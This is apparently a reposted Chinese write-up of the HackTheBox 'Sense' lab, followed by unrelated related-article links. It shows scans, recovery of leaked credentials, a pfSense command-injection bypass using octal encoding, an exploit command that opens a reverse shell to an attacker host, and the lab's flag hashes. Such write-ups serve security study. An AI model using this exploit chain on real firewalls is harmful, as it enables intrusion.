[Meachines] [Easy] Sense PFSense防火墙RCE

news2025/1/23 3:15:19

信息收集

IP AddressOpening Ports
10.10.10.60TCP:80,443

$ nmap -p- 10.10.10.60 --min-rate 1000 -sC -sV

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
|_http-server-header: lighttpd/1.4.35

HTTPS

https://10.10.10.60/

image.png

$ gobuster dir -u "https://10.10.10.60/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50 -k

$ curl "https://10.10.10.60/system-users.txt" -k

image-2.png

username:rohit password:pfsense

image-1.png

PFSense防火墙-RCE

image-4.png

$ searchsploit -w PFSense 2.1.3

image-5.png

pfSense的status_rrd_graph_img.php页面在处理graph参数时存在命令注入漏洞。尽管对graph参数进行了正则表达式过滤,但管道字符(|)未被移除。通过使用八进制编码,可以绕过非法字符的过滤,注入并执行任意操作系统命令。

$ python3 exp.py --rhost 10.10.10.60 --lhost 10.10.16.14 --lport 10032 --username rohit --password pfsense

image-6.png

User.txt

8721327cc232073b40d27d9c17e7348b

Root.txt

d08c32a5d4f8c8b10e76eb51a69f1a86

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1978202.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

zlm-openRtpServer使用

zlm-openRtpServer使用

http://127.0.0.1/index/api/openRtpServer?port50253&tcp_mode1&stream_idtest123&secretLSAjqhPDsC0IcL27hI6U8heTxgnTlZlW使用getRtpInfo查看这个流的情况,注意只有这个端口在接受流的时候,才会返回数据 http://127.0.0.1/index/api/ge…
阅读更多...
【文献阅读】TAM: Topology-Aware Margin Loss for Class-Imbalanced Node Classification

【文献阅读】TAM: Topology-Aware Margin Loss for Class-Imbalanced Node Classification

Abstract 在类别不平衡的图数据中学习无偏的节点表示是一项具有挑战性的任务,因为相邻节点之间存在相互作用。现有研究的共同点在于,它们根据少数类节点的总体数量“作为一个整体”进行补偿(忽略了图中的节点连接),这…
阅读更多...
理解<共轭复数乘法,复数乘法,复数除法>

理解<共轭复数乘法,复数乘法,复数除法>

目录 复数乘法共轭复数乘法的理解复数除法 复数乘法 共轭复数乘法的理解 共轭复数乘法:可以理解为滤波,计算两序列的相关。即一个序列固定,另一个序列进行滑动计算该点的累积和。因为傅里叶变换的卷积定理,时域卷积对于频域相乘。…
阅读更多...
web漏洞-知识点详解

web漏洞-知识点详解

先放张图!右边漏洞比左边漏洞更重要!右边漏洞更多!重点讲述右边漏洞! sql注入 危害情况:可以获取网站数据库中的数据,如果数据中有敏感信息,比如管理员账号密码,就可以登录后台 漏…
阅读更多...
学生管理系统之更新和删除、筛选

学生管理系统之更新和删除、筛选

学生管理系统之更新和删除 建立新的窗口 添加组件 进行布局 使用Widget把二个放在一块,作为一列,然后全选进行栅格布局,最后添加弹簧进行微调。 编写增加的槽函数 在主函数中调用对话框
阅读更多...
CC++内存魔术:掌控无形资源

CC++内存魔术:掌控无形资源

hello,uu们,今天呢我们来详细讲解C&C的内存管理,好啦,废话不多讲,开干 1:C/C内存分布 2:C语言中动态内存管理方式:malloc/calloc/realloc/free 3:C内存管理方式 3.1:new/delete操作内置类型 3.1.1:代码1 3.1.2:代码2 3.2:new和delete操作自定义类型 3.2.1:C语言创建…
阅读更多...
初识增强现实(AR)

初识增强现实(AR)

初识增强现实(AR) 笔记来源: 1.2023年中国增强现实(AR)行业研究报告 2.wiki/Augmented reality 3.In-Depth Review of Augmented Reality: Tracking Technologies, Development Tools, AR Displays, Collaborative AR…
阅读更多...
js第二天

js第二天

比较运算符 ==左右两边值是否相等 ===左右两边值和类型是否全相等 !==左右两边是否类型和值全不相等 undefin === null NaN === NaN(错误,NaN不等于任何值) =单等是赋值 ==双等是判断 ===三等是全等,开发中判断是否相等,一般用全等。 console.log 先比较a和a,相…
阅读更多...
电脑添加虚拟网卡与ensp互联,互访

电脑添加虚拟网卡与ensp互联,互访

一、按照过程 1、打开设备管理器 2、点击网络适配器,点击左上角操作,点击“添加过时硬件” 3、下一页 4、选择“安装我手动从列表选择的硬件”,下一页 5、下拉,选择“网络适配器”,下一页 6、厂商选择“Microsoft”&…
阅读更多...
基于MFC对话框吸管实验

基于MFC对话框吸管实验

1.新建项目 2.将bmp图像放入res文件下 3.导入bmp文件到bitmap 4.在dlg中添加picture控件,修改控件属性(Type Image属性),把bitmap资源添加到控件中 5.重写鼠标单击鼠标中键响应事件 6.主要源代码 void CMFC吸管Dlg::OnMButtonDow…
阅读更多...
使用Springboot + netty 打造聊天服务之Nacos集群问题记录

使用Springboot + netty 打造聊天服务之Nacos集群问题记录

目录 1、前言1.1、方法一1.2、方法二 2、方案二实战2.1、在netty服务里加上ws连接、中断事件2.2、在netty服务里加上消息服务 4、总结 使用Springboot netty 打造聊天服务系列文章 第一章 初始搭建工程 第二章 Nacos集群问题记录 1、前言 在使用Springboot Nacos Netty(Web…
阅读更多...
SAPUI5基础知识23 - 模型的种类(小结)

SAPUI5基础知识23 - 模型的种类(小结)

1. 背景 在前序的学习中,我们学习了SAPUI5的MVC架构中的各个知识点,包括视图的设计,控制器的设计,以及模型的使用。 在企业级应用程序中,对于数据的处理的需求是很大的,在学习更复杂的数据绑定方式之前&a…
阅读更多...
Pr2024苹果(mac)版剪辑软件安装下载(附下载链接)

Pr2024苹果(mac)版剪辑软件安装下载(附下载链接)

Adobe Premiere Pro 2024(简称PR 2024)是一款由Adobe公司开发的专业视频编辑软件,被广泛应用于电影、电视、广告和社交媒体视频的制作。以下是对PR 2024的详细简介: 链接:https://pan.baidu.com/s/1rN-3kB3KQgn0JswDa…
阅读更多...
《学会 SpringMVC 系列 · 剖析初始化》

《学会 SpringMVC 系列 · 剖析初始化》

📢 大家好,我是 【战神刘玉栋】,有10多年的研发经验,致力于前后端技术栈的知识沉淀和传播。 💗 🌻 CSDN入驻不久,希望大家多多支持,后续会继续提升文章质量,绝不滥竽充数…
阅读更多...
win10系统资源监视器磁盘蓝黄线、活动时间代表什么意思?

win10系统资源监视器磁盘蓝黄线、活动时间代表什么意思?

win10系统资源监视器磁盘蓝黄线、活动时间代表什么意思?在win10系统中磁盘在运行工程中会有不同的数据信息显示,如下图所示,10兆字节/秒、磁盘中蓝线和黄线、活动时间都达标什么意思呢?本文中winwin7小编给大家分享介绍下win10系统…
阅读更多...
Python 爬虫入门(六):urllib库的使用方法

Python 爬虫入门(六):urllib库的使用方法

Python 爬虫入门(六):urllib库的使用方法 前言1. urllib 概述2. urllib.request 模块2.1 发送GET请求2.2 发送POST请求2.3 添加headers2.4 处理异常 3. urllib.error 模块4. urllib.parse 模块4.1 URL解析4.2 URL编码和解码4.3 拼接URL 5. ur…
阅读更多...
MySQL主从复制原理及实现教程

MySQL主从复制原理及实现教程

MySQL主从复制是一种数据复制技术,通过建立主服务器(Master)与从服务器(Slave)之间的数据同步,实现数据的备份、负载均衡和高可用性。 主从复制原理 MySQL binlog(binary log 即二进制日志文件) 主要记录…
阅读更多...
Python 如何创建和操作矩阵?

Python 如何创建和操作矩阵?

在Python中,矩阵是二维数组的一种常见表示方式,特别是在数学和科学计算领域。矩阵用于表示和操作多维数据,包括数据分析、图像处理、机器学习、以及物理模拟等诸多领域。Python的NumPy库是处理矩阵的主要工具之一。NumPy提供了高效的多维数组…
阅读更多...
Deformable Detr

Deformable Detr

参考: https://search.bilibili.com/all?vt68804228&keywordco-detr&from_sourcewebtop_search&spm_id_from333.1007&search_source5 详解可以看李宏毅的transformer视频。
阅读更多...
SAP MM维护采购信息记录只到采购组织层级时候,税码输入报错 MESSAGE 06388

SAP MM维护采购信息记录只到采购组织层级时候,税码输入报错 MESSAGE 06388

原因:税确认应该是在工厂层级 解决:对06388 消息号进行更改类型改成W
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023